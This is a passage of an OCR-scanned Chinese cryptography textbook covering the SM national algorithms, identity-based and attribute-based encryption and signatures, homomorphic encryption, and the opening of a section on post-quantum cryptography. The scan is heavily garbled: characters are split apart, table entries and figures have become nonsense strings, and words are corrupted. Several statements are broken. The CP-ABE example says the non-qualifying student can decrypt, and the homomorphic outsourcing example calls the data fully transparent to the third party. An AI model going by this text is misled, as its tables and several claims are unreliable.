SM7 对 外 不 公开 , 若 想 要 调用 的 话 ,需要 通过 加 密 芯片 的 接口 。SM2 是 国家 密码 管理 局 
于 2010 年 12 月 17 日 发 布 的 椭圆 曲线 公 钥 密码 算法 。SM9 是 国家 密码 管理 局 于 2016 年 
3 月 28 日 发 布 的 国家 密码 行业 标准 (GM/T 0044 一 2016)。 它 是 基于 双 线 性 对 的 身份 标 
识 的 公 钥 密码 算法 ,也 称 标识 密码 , 它 可 以 根据 用 户 的 身份 标识 生成 用 户 的 公 、 私 钥 对 , 主 
要 用 于 数字 签名 、. 密 钥 交 换 以 及 密 钥 封装 机 制 等 。2018 年 4 月 ,我 国 提出 的 (SM9-IBE 标 
识 加 密 算法 纳入 ISO/IEC 18033-5)(SM9-K A. 密 钥 交换 协议 纳入 ISO/IEC 11770-3) 55:95 
码 算 法 标准 提案 获得 立项 ,SM 系列 国 密 算法 总 结 如 表 2-13 所 示 。 


X213 SM 系列 国产 密码 算法 


算法 编号 算法 性 质 算法 发 布 形式 算法 功能 
SMI 分 组 对 称 密码 算法 加 密 芯 片 单 钥 加 密 / 解 密 
SM2 椭圆 曲线 公 钥 密码 算法 软件 代码 双 角 加密/ 解密 ,数字 签名 
SM3 fI] Z8 H6 PRÉC TAS 软件 代码 杂凑 函数 
SM4 分 组 对 称 加 密 算 法 软件 代码 单 钥 加 密 / 解 密 ( 无 线 ) 
SM7 分 组 对 称 加 密 算法 非 接触 IC 卡 单 钥 加 密 / 解 密 
SM9 标识 密码 算法 一 一 
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23 密码 学 新 进展 


2.3.1 身份 基 公 钥 密 码 


身份 基 公 钥 密 码 (Identity-Based Cryptograph,IBC) 是 一 种 公 钥 密码 体制 ,有 效 简 化 
了 公 钥 基础 设施 (Public Key Infrastructure. PKD 中 证 书 权 威 (Certificate Authority. 
CA) 对 用 户 证 书 管 理 带 来 的 复杂 密 钥 管理 问题 。 由 RSA 加 密 系统 发 明 者 之 一 Shamir 于 
1984 年 首次 提出 。 在 身份 基 公 钥 密码 体制 中 ,Shamir 建议 使 用 能 唯一 标识 用 户 身份 的 
信息 作为 公 钥 ,例如 电话 号 码 或 E-mail 地 址 等 ,无 须 CA 分 发 数字 证 书 进行 绑 定 , 克 服 了 
传统 公 钥 密码 体系 中 管理 用 户 证 书 带 来 的 弊端 。 


1. 身份 基 公 钥 密码 

在 身份 基 公 钥 密 码 中 ,用 户 公 钥 可 以 为 任意 的 比特 串 , 用 户 私 钥 通过 可 信 的 第 三 方 ， 
即 私 钥 生成 中 心 (Private Key Generator, PKG) 生 成 。 身 份 基 公 钥 密码 密 钥 生成 过 程 如 
图 2-23 所 示 。 假 设 PKG 的 公私 钥 对 为 (pk,sk) ,用 户 的 公 钥 身份 字符 串 是 ID. PKG 生成 
用 户 的 私 钥 sw 作 为 sk 和 ID 的 函数 。 


PKG Bob 


ID 


M———————— 
sip 7 f (sk,ID) 


(pk, sk) D 


图 2-23 身份 基 公 钥 密码 密 钥 生 成 过 程 


2. 身份 基 加 密 

Shamir 提出 身份 基 公 钥 密 码 机 制 以 后 ,密码 学 家 对 这 一 领域 进行 了 深入 探索 。 由 于 
未 找到 有 效 的 工具 ,使 得 实现 身份 基 加 密 (Identity Based Encryption,IBE) 成 为 一 个 公开 
问题 。 直 到 2001 年 ,Boneh 和 Franklin 取得 了 突破 ,其 使 用 双 线性 配对 技术 提出 了 第 一 
个 可 证 明 安全 且 实 用 的 身份 基 加 密 方案 ,使 得 身份 基 公 钥 密码 得 到 了 快速 发 展 。 近 年 来 ， 


gi 

身份 基 加 密 机 制 框架 如 图 2-24 所 示 。 用 户 Alice 给 用 户 Bob 发 送 消息 ,Bob 的 公 钥 
为 bob@b.com。Alice 只 须 使 用 Bob 的 公 钥 加 密 消息 即 可 。Bob 接收 加 密 的 消息 后 ,向 
PKG 认证 并 申请 私 钥 , 收 到 解密 私 钥 后 ,Bob 进行 解密 ,阅读 Alice 发 送 的 消息 。 

一 个 身份 基 加 密 方案 包含 4 个 算法 : 

(OD 系统 建立 算法 : PKG 生成 系统 公开 参数 和 主 密 钥 。 

Q 密 钥 提取 算法 : 用 户 将 自己 身份 ID 提交 给 PKG,PKG 生成 ID 对 应 的 私 钥 。 
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C 加 密 算法 : 利用 用 户 身份 ID 加 密 消息 ,生成 加 密 密 文 。 
CD 解密 算法 : 利用 身份 ID 对 应 的 私 钥 解密 密 文 ,得 到 明文 消息 。 


OO 一 
2. 认证 并 申请 对 应 标识 3. 安 全 地 分 发 
Bob@b.com 的 私 钥 Bob@b.com 的 私 钥 
EE 1. Alice 用 Bob@b.com 加 密 i 9 4. Bob 用 私 钥 解 密 Ey 
Alice(2a.com Bob@b.com E 


图 2-24 身份 基 加 密 机 制 框架 


身份 基 加 密 方案 扩展 了 身份 基 公 钥 密 码 体制 ,能 够 较 好 地 解决 PKI 证 书 管理 复杂 问 
题 。 因 而 ,IBE 被 广泛 应 用 于 安全 电子 邮件 、Ad Hoc 网 络 密 钥 管理 等 应 用 场景 。 


3. 身份 基 签名 

Shamir 在 提出 身份 基 公 钥 密 码 概念 的 同时 ,采用 RSA 签名 给 出 了 首 个 身份 基 签 名 
(Identity Based Signature,IBS) 方 案 , 之 后 多 种 身份 基 签 名 方案 被 相继 提出 ,包括 具有 特 
殊 性 质 的 身份 基 签 名 ,如 身份 基 环 签名 、 身 份 基 盲 签名 等 。 

一 个 身份 基 签 名 方案 包含 4 个 算法 : 

(D 系统 建立 算法 : PKG 生成 系统 公开 参数 和 主 密 钥 。 

@ 密 钥 提取 算法 : 用 户 将 自己 身份 ID 提交 给 PKG,PKG 生成 用 户 ID 对 应 的 私 钥 。 

@ 签名 算法 : 给 定 用 户 身份 ID 的 私 钥 和 消息 ,生成 对 应 消息 的 签名 。 

@ 验证 算法 : 给 定 用 户 身份 ID、 签 名 和 消息 ,验证 是 否 为 正确 的 签名 。 

身份 基 签 名 方案 扩展 了 身份 基 公 钥 密 码 体制 ,但 一 般 的 身份 基 签 名 方案 与 传统 的 公 
钥 签 名 方案 相 比 并 没有 非常 明显 的 优点 ,其 主要 原因 在 于 传统 公 钥 签名 本 身 也 同样 能 实 
现 基于 身份 签名 的 功能 。 


4. 身份 基 公 钥 密 码 的 优 缺 点 

身份 基 公 钥 密码 与 基于 PKT 的 密码 都 属于 公 钥 密码 体制 ,身份 基 公 钥 密 码 体制 与 传 
统 的 公 钥 密码 体制 相 比 ,存在 以 下 优 缺 点 : 

无 需 公 钥 证 书 ,用 户 身份 作为 唯一 识别 其 身份 的 公 钥 ,加 密 或 签名 验证 不 需要 知 
道 除 身份 外 的 其 他 信息 。 

@ 无 需 证 书 机 构 ,存在 可 信 第 三 方 私 钥 生成 中 心 C(PKG) 向 用 户 提供 服务 。 用 户 向 
PKG 提交 自己 的 身份 ID,PKG 生成 并 颁发 ID 的 私 钥 。 与 PKI 机制 相 比 ,PKG 无 须 处 理 
第 三 方 的 请 求 , 降 低 了 加 密 的 开销 和 基础 设施 要 求 。 

密 钥 托管 是 身份 基 公 钥 密 码 的 一 个 缺点 。 私 钥 生 成 过 程 中 ,用 户 将 身份 ID 提交 给 
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PKG.PKG 生成 并 颁发 用 户 ID 的 私 钥 。 亚 意 的 PKG 可 能 存储 用 户 私 钥 的 副本 ,使 其 有 
能 力 解密 任何 一 个 用 户 发 送 给 用 户 ID 的 密 文 或 伪造 用 户 ID 的 数字 签名 。 

为 了 解决 密 钥 托管 问题 ,可 采用 分 布 式 密 钥 生成 技术 或 门限 技术 将 PKG 权限 分 配 
给 多 个 实体 ,防止 单个 PKG 权限 过 大 问题 。 也 可 以 采用 安全 多 方 计算 技术 ,使 得 用 户 参 
与 私 钥 生成 过 程 , 私 钥 中 包含 仅 由 用 户 ID 持 有 的 相关 信息 ,从 而 降低 对 可 信 私 钥 生 成 中 
心 的 过 分 依赖 。 

身份 基 公 钥 密 码 以 其 自身 优越 性 ,引起 了 学 术 界 以 及 工业 界 的 广泛 关注 。2006 年 ， 
国际 标准 化 组 织 (ISO) 在 ISO/TEC 14888-3 中 给 出 了 两 个 身份 基 签 名 体制 的 标准 。IEEE 
组 织 专门 的 身份 基 公 钥 密 码 体制 工作 组 (IEEE P1363.3) ,征集 身份 基 密码 体制 的 标准 。 
近 几 年 ,国产 身份 基 公 钥 密 码 体制 的 标准 化 工作 也 取得 了 一 定 进 展 。2016 年 3 月 28 日 ， 
中 华人 民 共 和 国 国家 密码 管理 局 发 布 GM/T 0044—2016 SM9 标识 密码 算法 ,进一步 丰 
富 了 身份 基 公 钥 密 码 体系 。 探 索 身 份 基 公 钥 密 码 体制 及 其 新 应 用 仍然 是 当前 学 术 界 及 工 
业界 关注 的 热点 问题 之 一 。 


2.3.2 ”属性 基 公 钥 密 码 


2.3.1 节 介 绍 了 身份 基 公 钥 密 码 的 内 容 , 我 们 知道 在 传统 的 IBE 体制 中 ,发送 方 在 加 
密 消 息 前 必须 要 获悉 接收 方 的 身份 信息 ( 公 钥 ) ,用 接收 方 的 公 钥 对 消息 进行 加 密 ,接收 方 
用 自己 的 私 钥 解密 。 通 信 过 程 是 一 对 一 的 ,然而 现实 世界 中 更 多 的 是 一 对 多 的 通信 模式 。 
尽管 可 以 通过 多 次 的 一 对 一 模式 来 实现 多 对 一 通信 模式 ,但 是 当 接 收 方 人 数 很 多 时 ,这 种 
方法 无 疑 非常 低 效 。 

属性 基 公 钥 密 码 (Attribute-Based Cryptography. ABC) 是 在 身份 基 公 钥 密 码 的 基础 
上 发 展 起 来 的 。2005 年 ,Sahai 和 Waters 提出 的 模糊 身份 基 加 密 (Fuzzy Identity-Based 
Encryption) 中 ,首次 引入 了 属性 基 加 密 (Attribute-Based Encryption，ABE) 的 概念 。 作 
为 身份 基 密 码 体制 的 一 种 扩展 ,属性 基 密 码 将 代表 用 户 身 份 的 字符 串 由 一 系列 描述 用 户 
特征 的 属性 来 代替 ,例如 ,工作 单位 .职位 .性 别 等 。 用 户 的 公私 钥 均 与 属性 相关 。 举 个 例 
子 , 某 个 文件 允许 计算 机 专业 的 学 生 可 以 访问 ,那么 “计算 机 专业 ”和 * 学 生 ” 就 是 访问 结构 
中 所 要 求 的 属性 ,同时 具备 属性 “计算 机 专业 ”和 “学 生 ” 的 用 户 才 可 以 成 功 访问 该 文件 , 否 
则 无 法 访问 。 


1. 属性 基 加 密 
在 属性 基 加 密 中 , 密 钥 和 密 文 都 与 一 组 属性 相关 联 , 加 密 者 根据 将 要 加 密 的 消息 和 接 
收 者 的 属性 构造 一 个 加 密 策略 , 当 属 性 满足 加 密 策略 时 ,解密 者 才能 够 解密 。 属 性 基 加 密 
可 以 被 用 来 有 效 地 实现 非 交互 式 访问 控制 。 在 传统 的 访问 控制 机 制 中 ,用 户 的 访问 权限 
和 数据 都 由 管理 员 来 分 配 和 管理 , 当 系 统 中 的 用 户 越 来 越 多 ,数据 量 越 来 越 大 时 , 错 综 复 
杂 的 用 户 数据 面临 着 隐私 泄露 的 风险 。 从 数据 隐私 的 角度 出 发 ,用 户 一 般 情况 下 不 愿 自 
己 的 数据 对 服务 器 透明 。 另 外 , 当 存 储 服务 器 遭 到 黑客 人 侵 时 ,所 有 用 户 数据 都 将 被 非法 
窃取 。 在 属性 基 加 密 中 ,系统 的 每 个 权限 都 可 以 用 一 个 属性 来 表示 。 系 统 中 存在 一 个 属 
性 权威 (Attribute Authority. AA) ,属性 权威 对 每 个 用 户 的 属性 进行 认证 ,并 颁发 相应 密 
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钥 。 系 统 中 所 有 数据 都 以 密 文 的 形式 存储 在 服务 器 中 ,任何 人 都 可 以 访问 服务 器 ,但 只 有 
属性 与 访问 策略 相 匹 配 时 ,数据 才能 被 解密 。 属 性 基 加 密 机 制 实 现 非 交 互 式 访问 控制 如 
图 2-25 所 示 。 


密 文 数据 库 服 务 器 lu. 六 ele 


2-25 属性 基 加 密 机 制 实现 非 交 互 式 访问 控制 


按照 密 文 的 生成 过 程 ,属性 基 加 密 可 分 为 密 钥 策略 属性 基 加 密 (Key Policy 
Attribute-Based Encryption，KP-ABE) 和 密 文 策略 属性 基 加 密 (Ciphertext Policy 
Attribute-Based Encryption. CP-ABE) 。 

2006 年 ,Goyal 等 提出 了 密 钥 策 略 属性 基 加 密 方案 KP-ABE。 顾 名 思 义 ,在 KP-ABE 
中 , 密 钥 对 应 于 访问 结构 ,而 密 文 对 应 于 属性 集合 , 当 且 仅 当 密 文 对 应 的 属性 集合 能 够 与 
用 户 密 钥 中 的 访问 结构 相 匹 配 时 , 密 文才 能 够 被 成 功 解密 。 身 份 基 加 密 可 以 被 视 为 一 种 
特殊 的 KP-ABE 方案 ,其 中 , 密 文中 的 属性 为 目标 接收 者 的 身份 ,解密 者 密 钥 相关 联 的 访 
问 策略 为 : 当 且 仅 当 密 钥 宿 主 的 身份 与 密 文中 包含 的 目标 接收 者 身份 一 样 时 , 方 可 解密 。 
如 图 2-26(a) 所 示 , 以 电视 节目 为 例 , 假 设 某 用 户 想 要 观看 时 长 为 两 小 时 左右 的 喜剧 片 或 
科技 片 , 则 节目 1 所 包含 的 属性 2h 和 “喜剧 ”满足 用 户 的 要 求 ,节目 1 可 以 被 用 户 成 功 解 
密 观 看 ,而 节目 2 不 满足 要 求 ,无 法 解密 。 


i» [em]. 8. mix | ss]. 
节目 1 e (AND) 学 生 1 ^ [&) (ND) 
y^ BP Con) [2n ext Bud 
/ 


日 asmin] | 科技] 喜剧 | [ 科技 ] - t 民 商 法 || A 大 学 刑法 | [ 民 商 法 


(a) KP-ABE 场 景 示意 图 (b) CP-ABE 场 景 示意 
2-26 KP-ABE 和 CP-ABE 场景 示意 图 


一 般 KP-ABE 由 以 下 算法 构成 : 
CD 初始 化 : 输入 安全 参数 4 ,生成 主 密 钥 msk 和 系统 参数 pk. 
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Q) 密 钥 生成 : 输入 一 个 访问 控制 结构 工 ,系统 主 密 钥 msk 和 系统 参数 pk, 输 出 私 
钥 sk, 

@ 加 密 : 输入 系统 参数 pk, 发 送 方 属性 集合 W, 待 加 密 消 息 m ,输出 密 文 c。 

CD 解密 : 输入 私 钥 sk, 密 文 c ,系统 参数 pk。 若 发 送 方 属性 集合 满足 接收 方 访问 结 
构 , 解 密 成 功 ,输出 明文 m。 否 则 解密 失败 。 

2007 年 ,Bethencourt 等 人 提出 了 密 文 策略 属性 基 加 密 方案 CP-ABE。 在 CP-ABE 
中 , 密 文 对 应 于 一 个 访问 结构 ,用户 密 钥 对 应 于 属性 集合 ,用 户 可 以 用 自己 的 属性 集合 向 
属性 权威 请 求 密 钥 。 仅 当 用 户 的 属性 集合 满足 密 文中 的 访问 结构 时 ,才能 够 获得 解密 权 
限 。 如 图 2-26(b) 所 示 ,假设 某 法 律 文件 只 允许 A 大 学 的 刑法 专业 或 民 商法 专业 的 学 生 
查看 , 则 学 生 2 所 包含 的 属性 * 民 商法 ”和 ”*A 大 学 ”满足 要 求 , 而 学 生 1 所 包含 的 属性 “ 刑 
法 ”和 *B 大 学 ”不 满足 要 求 , 此 文件 可 以 被 学 生 1 成 功 解密 查看 。 一 般 CP-ABE 由 以 下 算 
法 构成 : 

CD 初始 化 : 输入 安全 参数 ,生成 主 密 钥 msk 和 系统 参数 pk. 

@ 密 钥 生成 : 输入 系统 主 密 钥 msk. 系统 参数 pk, 接 收 方 的 属性 集合 W, 输 出 私 
钥 sk。 

C 加 密 : 输入 系统 参数 pk ,访问 控制 结构 工 , 待 加 密 消息 m ,输出 密 文 c。 

CD 解密 : 输入 私 钥 sk, 密 文 c ,系统 参数 pk。 若 接收 方 属 性 集合 满足 发 送 方 访问 控 
制 结构 ,解密 成 功 , 输 出 明文 m。 否 则 解密 失败 。 


2. 属性 基 签 名 

与 属性 基 加 密 相 对 应 ,属性 基 签 名 (Attribute-Based Signature. ABS) 近 年 来 也 得 到 
了 广泛 关注 。 类 似 地 ,属性 基 签 名 是 由 模糊 身份 签名 发 展 而 来 的 。 属 性 基 签 名 根据 签名 
的 生成 过 程 分 为 密 钥 策略 属性 基 签 名 (Key Policy Attribute-Based Signature. KP-ABS) 
和 签名 策略 属性 基 签 名 (Signature Policy Attribute-Based Encryption, SP-ABS), 4H 
仅 当 属性 集合 满足 访问 结构 时 ,签名 者 可 以 对 消息 生成 合法 签名 。 相 比 于 传统 的 数字 签 
名 ,除了 要 满足 正确 性 和 不 可 伪造 性 之 外 ,属性 基 签 名 还 要 满足 匿名 性 , 即 验证 者 通过 签 
名 仅仅 能 够 知道 签名 者 的 属性 与 访问 结构 是 相 匹配 的 ,无 法 知道 签名 者 具体 的 属性 和 身 
份 等 其 他 任何 信息 。 


3. 属性 基 公 钥 密 码 的 相关 研究 

(1) 支持 属性 撤销 的 属性 基 加 密 

在 属性 基 密 码 体制 中 ,系统 中 用 户 权限 是 动态 变化 的 , 当 用 户 所 拥有 的 属性 发 生变 动 
时 ,难免 会 有 密 钥 泄露 的 风险 ,因而 不 得 不 考虑 密 钥 及 属性 撤销 的 问题 。 引 入 撤销 机 制 是 
抵抗 密码 算法 中 密 钥 滥用 等 恶意 行为 的 重要 途径 。 按 照 撤 销 执行 者 的 不 同 , 属 性 撤销 可 
分 为 直接 撤销 和 间接 撤销 。 直 接 撤 销 是 指 发 送 者 预先 设 定 一 个 撤销 列表 ,直接 按照 列表 
进行 撤销 ,用 户 无 须 进行 密 钥 更 新 。 而 间接 撤销 需要 依托 属性 权威 ,定期 进行 密 钥 更 新 ， 
合法 用 户 才能 够 申请 有 效 的 密 钥 ,被 撤销 的 用 户 无 法 继续 获取 密 钥 。 

(2) 访问 结构 隐藏 的 属性 基 加 密 

传统 的 属性 基 加 密 中 ,大 部 分 与 密 文 相关 的 访问 结构 或 是 属性 集合 都 是 完全 公开 的 ， 
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这 样 存在 隐私 泄露 的 风险 。 为 了 增强 数据 访问 过 程 中 的 隐私 性 ,访问 结构 隐藏 的 属性 基 
加 密 机 制 被 引入 。 在 访问 结构 隐藏 的 属性 基 加 密 方案 中 ,无论 用 户 是 否 拥有 解密 的 权限 ， 
都 无 法 知道 密 文 访问 结构 的 相关 信息 。 

(3) 多 权威 属性 基 加 密 

在 传统 的 属性 基 加 密 方案 中 ,用 户 属性 都 是 由 属性 权威 来 进行 认证 并 授权 密 钥 的 。 
在 分 布 式 应 用 的 场景 下 ,单个 属性 权威 无 法 满足 大 规模 的 分 布 式 应 用 需求 , 且 容 易 遭 受 拒 
绝 服务 攻击 。 并 且 在 现实 世界 中 ,我 们 的 多 个 属性 是 由 不 同 的 机 构 进行 分 管 的 ,例如 , 院 
校 信 息 .学 号 和 专业 等 是 由 学 校 认证 和 管理 的 ,身份 证 信息 和 户口 信息 等 是 由 公安 机 构 认 
证 和 管理 的 。 对 此 ,Chase 首次 提出 了 多 权威 属性 基 加 密 (Multirauthority ABE，MA- 
ABE) ,用 户 的 密 钥 不 再 由 单一 的 属性 权威 授权 颁发 ,每 个 属性 权威 管理 一 个 区 域 , 为 本 
区 域 的 用 户 授权 颁发 密 钥 。 所 有 的 属性 被 划分 为 属性 子 集 , 分 发 给 不 同 的 属性 权威 。 同 
时 ,这 种 多 权威 属性 基 加 密 机 制 很 大 程度 上 降低 了 属性 权威 的 工作 量 。 

属性 基 公 钥 密 码 拥有 许多 良好 的 性 质 , 能 够 有 效 实 现 非 交 互 式 的 细 粒 度 访问 控制 ,并 
且 在 加 密 数 据 库 、 物 联网 和 云 计算 等 诸多 领域 都 有 良好 的 应 用 前 景 。 感 兴趣 的 读者 可 以 
阅读 参考 文献 中 的 方案 ,了 解 具体 的 实现 细节 和 属性 基 密 码 学 的 研究 现状 及 发 展 趋势 。 


2.3.3” 同 态 密码 


随 着 云 计算 模式 的 普及 与 应 用 ,数据 存储 和 计算 服务 的 外 包 已 经 成 为 必然 趋势 ,由 此 
带 来 的 数据 安全 和 隐私 保护 问题 愈加 受到 产业 界 与 学 术 界 的 广泛 关注 。 同 态 密码 可 以 在 
不 泄露 敏感 信息 的 前 提 下 完成 对 密 文 的 处 理 任务 ,有 着 与 生 俱 来 的 保护 用 户 数据 安全 和 
隐私 的 特性 ,成 为 保护 数据 安全 ,提高 密 文 处 理 分 析 能 力 的 关键 技术 。 该 技术 在 分 布 式 计 
算 环境 下 的 密 文 数据 计算 处 理 方面 具有 比较 广泛 的 应 用 领域 ,例如 云 计 算 、 多 方 安全 计 
算 、 匿 名 投票 . 密 文 检索 与 匿名 访问 等 ; 除 此 之 外 , 同 态 密码 技术 在 数据 挖掘 隐私 保护 方面 
也 有 相应 的 应 用 。 

同 态 密码 的 概念 最 初 是 由 Rivest、Adleman 和 Dertouzos 于 1978 年 在 题 为 On data 
banks and. privacy homomor phic 的 论文 中 提出 的 隐私 同 态 (Privacy Homomorphic) f 
念 。 他 们 给 出 一 个 “保密 数据 库 (private data banks)” 的 应 用 场景 : 用 户 将 个 人 敏感 数据 
加 密 后 存储 在 一 个 不 可 信 的 服务 器 中 ,服务 器 并 给 出 正确 的 查询 应 答 。 因 此 ,从 某 种 角度 
讲 , “保密 数据 库 ” 的 思想 已 经 基本 完整 涵盖 了 数据 存储 与 数据 处 理 的 过 程 ,完全 可 以 将 其 
视 作 当今 流行 的 云 存储 与 云 计 算 融 合 的 一 种 概念 性 雏形 。 同 态 加 密 思 想 从 提出 到 现在 ， 
在 具体 实现 方案 方面 ,经 历 了 3 个 重要 时 期 : 1978 一 1999 年 是 部 分 同 态 加 密 的 繁荣 发 展 
时 期 ;1996 一 2009 年 是 部 分 同 态 加 密 与 浅 同 态 加 密 的 交织 发 展 时 期 ,也 是 浅 同 态 加 密 方 
案 的 繁荣 发 展 时 期 ;2009 年 以 后 是 全 同 态 加 密 的 繁荣 发 展 时 期 。 同 态 加 密 从 部 分 同 态 发 
展 到 全 同 态 加 密 , 同 态 签 名 借鉴 同 态 加 密 的 思想 也 陆续 发 展 起 来 ,2002 年 Johnson 等 人 
首次 提出 了 同 态 签名 的 概念 ,之 后 , 同 态 签 名 从 线性 同 态 发 展 到 全 同 态 签名 。 许 多 密码 学 
家 将 全 同 态 加 密 思 想 置 于 与 公 钥 加 密 思想 比肩 齐名 的 重要 地 位 ,他 们 认为 “ 公 钥 加 密 方案 
开辟 了 密码 学 的 新 方向 ,而 实用 的 全 同 态 加 密 方案 则 将 催生 新 型 分 布 式 计 算 模 式 ”。 全 同 
态 加 密 概念 自 提出 后 近 30 年 来 ,一 直 被 密码 学 界 誉 为 “密码 学 圣杯 ”。 
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1. 同 态 密码 技术 的 应 用 

安全 云 计算 与 委托 计算 : 同 态 技术 在 该 方面 的 应 用 可 以 使 得 用 户 在 云 环境 下 ,充分 
利用 云 服务 器 的 计算 能 力 ,实现 对 明文 信息 的 运算 ,而 不 会 有 损 私 有 数据 的 私密 性 。 例 
如 ,医疗 机 构 通常 拥有 比较 弱 的 数据 处 理 能 力 ,而 需要 第 三 方 来 实现 数据 处 理 分 析 以 达到 
更 好 的 医疗 效果 或 者 科研 水 平 , 这 样 他 们 就 需要 委托 有 较 强 数 据 处 理 能 力 的 第 三 方 实现 
数据 处 理 ( 云 计算 中 心 ) ,但 是 医院 负 有 保护 患者 隐私 的 义务 ,不 能 直接 将 数据 交 给 第 三 
方 。 在 同 态 加 密 技 术 的 支持 下 ,医疗 机 构 就 可 以 将 加 密 后 的 数据 发 送 至 第 三 方 , 待 第 三 方 
处 理 完成 后 便 可 返回 给 医疗 结构 。 整 个 数据 处 理 过 程 .数据 内 容 对 第 三 方 是 完全 透明 的 。 

远程 文件 存储 : 用 户 可 以 将 自己 的 数据 加 密 后 存储 在 一 个 不 信任 的 远程 服务 器 上 ， 
日 后 可 以 向 远程 服务 器 查询 自己 所 需要 的 信息 ,远程 服务 器 用 该 用 户 的 公 钥 将 查询 结果 
加 密 , 用 户 可 以 解密 得 到 自己 需要 的 信息 ,而 远程 服务 器 却 对 查询 信息 一 无 所 知 。 这 样 做 
还 可 以 实现 远程 用 户 数据 容 灾 。 

同 态 密码 技术 在 其 他 方面 也 有 诸多 应 用 ,例如 密 文 检索 、 安 全 多 方 计算 、 电 子 投票 多 
方 零 知识 证 明和 软件 保护 等 。 


2. 同 态 密码 技术 的 优 缺 点 

同 态 密码 技术 可 以 实现 无 密 钥 方 对 密 文 的 计算 处 理 , 密 文 计算 无 须 经 过 密 钥 方 , 既 可 
以 减少 通信 代价 ,又 可 以 避免 每 一 个 密 文 解密 后 再 计算 而 花费 高 昂 的 计算 代价 ,同时 ,对 
密 文 计算 后 解密 的 结果 与 明文 进行 同样 运算 的 结果 一 致 ,保证 了 运算 的 正确 性 。 但 是 , 目 
前 同 态 密码 技术 及 其 应 用 方面 还 存在 一 定 的 局 限 性 ,第 一 , 同 态 密码 技术 只 能 实现 单 比特 
加 密 ,效率 较 低 ,如 何 高 效 地 实现 全 同 态 加 密 有 待 进一步 研究 ;第 二 ,大 多 数 同 态 密码 技术 
基于 未 论证 的 困难 性 假设 ,寻找 可 论证 的 困难 问题 依然 是 个 摆 在 密码 工作 者 面前 的 难题 ; 
第 三 , 同 态 密码 技术 需要 额外 的 消除 噪音 算法 ,依然 不 是 自然 同 态 , 如 何 设计 一 个 具有 自 
然 同 态 性 的 全 同 态 加 密 方案 依然 是 一 个 开放 问题 。 


2.3.4 抗 量 子 密码 


近年 来 随 着 量子 计算 技术 的 发 展 ,构造 抗 量子 密码 已 经 迫在眉睫 。 如 表 2-14 Bron. 
很 多 广泛 部 署 的 密码 系统 在 量子 计算 环境 下 安全 水 平 显著 降低 。 因 此 ,在 量子 计算 时 代 
使 用 什么 密码 呢 ? 研究 表明 ,量子 计算 环境 下 的 密码 主要 有 3 种 : 基于 量子 物理 学 的 量 
子 密码 .基于 生物 学 的 DNA 密码 和 基于 数学 的 抗 量子 计算 密码 。 


表 2-14 广泛 部 署 的 密码 系统 及 其 安全 水 平 示例 


名 —W x); 能 安全 水 平 量子 安全 水 平 
AES-128 对 称 加 密 128 64(Grover) 
AES-256 对 称 加 密 256 128(Grover) 
SHA-256 AE RC 256 128(Grover) 
SHA3-256 杂凑 函数 256 128(Grover) 
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续 表 

名 称 功 能 安全 水 平 量子 安全 水 平 
RSA-3072 加 密 128 被 攻破 (Shor) 
RSA-3072 签名 128 被 攻破 (Shor) 
DH-3072 密 钥 交换 128 被 攻破 (Shor) 
DSA-3072 签名 128 被 攻破 (Shor) 
256-bit ECDH 密 钥 交换 128 被 攻破 (Shor) 
256-bit ECDSA 签名 128 被 攻破 (Shor) 


在 国际 上 ,基于 量子 物理 学 的 量子 密码 主要 集中 在 量子 密 钥 分 配 、 量 子 秘密 共享 、 量 
子 认证 ,量子 密码 算法 和 量子 密码 算法 的 安全 性 等 方面 的 研究 。 量 子 密 钥 分 配 长 期 以 来 
受到 了 众多 学 者 的 关注 和 研究 ,由 于 理论 上 量子 密 钥 分 配 与 “一 次 一 密 ” 相 结合 能 够 实现 
无 条 件 安全 。 而 量子 秘密 共享 和 量子 认证 相关 研究 尚 不 成 熟 ,还 没有 达到 经 典 密码 那样 
方便 。 针 对 基于 量子 物理 学 的 量子 密码 面临 着 很 多 困难 与 挑战 。 在 量子 密码 算法 设计 
中 ,为 实现 对 量子 信息 的 加 密 、 签 名 和 杂凑 等 ,需要 采用 量子 力学 中 的 么 正 变换 ,导致 方案 
构造 困难 。 对 于 量子 密码 算法 的 安全 性 , 它 是 基于 量子 物理 设备 的 ,因此 它 的 安全 与 其 物 
理 实现 密切 相关 。 
基于 生物 学 的 DNA 密码 是 随 着 基因 工程 和 生物 计算 的 发 展 而 诞生 的 ,其 安全 性 建 
立 在 生物 困难 问题 上 。 该 密码 以 DNA 为 信息 载体 ,把 现代 生物 学 技术 作为 实现 工具 , 利 
用 DNA 的 高 存储 密度 和 高 并 行 性 优点 ,实现 加 密 、 认 证 及 签名 等 功能 。 然 而 DNA 密码 
主要 依靠 实验 手段 ,缺少 理论 体系 ,实现 技术 难度 大 ,应 用 成 本 高 。 
基于 数学 的 抗 量子 密码 是 基于 量子 计算 机 不 擅长 计算 的 数学 困难 问题 构造 的 密码 。 
该 类 密码 算法 与 上 述 两 类 抗 量子 密码 相 比 ,有 很 多 优势 。 例 如 ,研究 方法 与 现 有 的 许多 经 
典 密码 一 致 ,很 多 方法 可 以 借用 ,并 且 与 现 有 密码 一 样 都 是 基于 数学 问题 的 ,密码 兼容 性 
好 ,系统 升级 容易 。 近 年 来 ,世界 各 国政 府 与 组 织 都 发 起 了 重大 研究 计划 来 研究 能 够 抵抗 
量子 计算 机 攻击 的 基于 数学 困难 问题 的 抗 量子 密码 ,如 欧盟 的 SAFEcrypto 项 目 . 日 本 的 
CryptoMath-CREST 密码 项 目 等 。 此 外 ,美国 国家 安全 局 (National Security Agency. 
NSA) .美国 国家 标准 与 技术 研究 院 (National Institute of Standards and Technology. 
NIST) 和 中 国 科 协 等 纷纷 发 布 了 各 自 的 基于 数学 的 抗 量子 密码 研究 计划 。 当 前 国际 上 公 
认 的 基于 数学 的 抗 量子 密码 方向 主要 有 : 基于 格 的 密码 .基于 Hash 的 数字 签名 、 基 于 纠 
错 编码 的 密码 和 基于 多 变量 的 密码 。 
基于 格 的 密码 算法 构造 是 建立 在 格 上 的 困难 问题 ,如 带 错误 的 学 习 (Learning With 
Errors,LWE) 问题 .最 短 整 数 解 (Shorter Integer Solution. SIS) 问题 .最 短 向 量 问题 
(Shortest Vector Problem. SVP) 、 有 和 界 距离 译 码 (Bounded Distance Decoding，BDD) 问 
题 等 。 基 于 格 的 抗 量子 密码 有 很 多 优势 。 例 如 , 格 密码 上 的 运算 简单 ,运算 速度 快 效率 
高 ;困难 问题 在 最 坏 情况 下 的 计算 复杂 性 等 于 平均 复杂 性 .使 得 基于 格 设计 的 密码 安全 概 
